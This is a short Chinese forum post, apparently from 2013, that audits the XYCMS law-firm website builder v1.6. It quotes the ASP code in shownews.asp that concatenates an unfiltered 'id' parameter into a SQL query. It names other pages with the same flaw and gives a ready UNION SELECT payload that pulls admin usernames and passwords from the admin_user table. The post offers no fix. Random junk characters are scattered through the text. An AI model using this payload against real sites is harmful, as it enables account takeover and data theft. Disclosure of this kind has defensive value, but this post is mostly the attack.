前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似' ?) S" D1 [ M# `
) ]4 S7 N- Q) i. ^0 Z9 r. ~5 X淫荡分割线; r, ]/ ^+ K7 {- L
--------------------------------------------------------4 h9 u% G# \% g1 a2 j% m- x0 s
9 I% p, r" X, b9 M审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)( E) h0 v( y$ h' M3 h
源码地址:http://down.chinaz.com/soft/29233.htm, X6 t9 x5 r' M! {3 [! p( G
- W* L2 \7 H% W1 q
漏洞文件:shownews.asp
+ H& _$ c% W2 e. V9 ?5 W漏洞代码:7-13行. M- P" E! p' V5 J E: X5 _- m
* p6 E5 N4 F( P $ f5 b+ o8 m& |, y
<% M( a( g; e; }- r# p# D* C; s* A
id=request.QueryString("id")6 B2 N4 b2 U( a5 Y/ }, X$ ]
3 _: t0 C- H- x' Mset snews=server.createobject("adodb.recordset") 1 ~ r' b3 R( C, o, r" p* M8 q
exec="select * from [news] where id="&id
5 j# D9 E. \: Y/ z: F1 \$ ksnews.open exec,conn,1,1
* i' ~3 P% {: [4 Q% m%>
: j. G |7 E7 M5 _- V+ T
) y: u: A- g' }' b X$ y
3 \. q: _0 M' i% F. H+ K2 r& }/ u- O什么过滤都没有 直造成注入
0 e- D: D, e$ y/ _/ C
* I. O* j4 I G- m9 W2 n" ?( w注入点:http://127.0.0.1:99/shownews.asp?id=xx. R1 g8 I- h0 x7 p9 I' g
5 f: t& d3 f. l6 N' y. A7 h( e
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
$ ?) x/ B( Q4 [3 S
1 j3 m4 _- g2 s" }* v! ~
) Z. Q+ N: k/ x; r+ N& Z9 Iexp: union select 1,admin,password,4,5,7 from admin_user
1 }- v" a) w% F/ |9 m5 g; }
9 Z" {' {' P' I2 z |
发表于 2013-4-4 17:28:12
收藏
支持
反对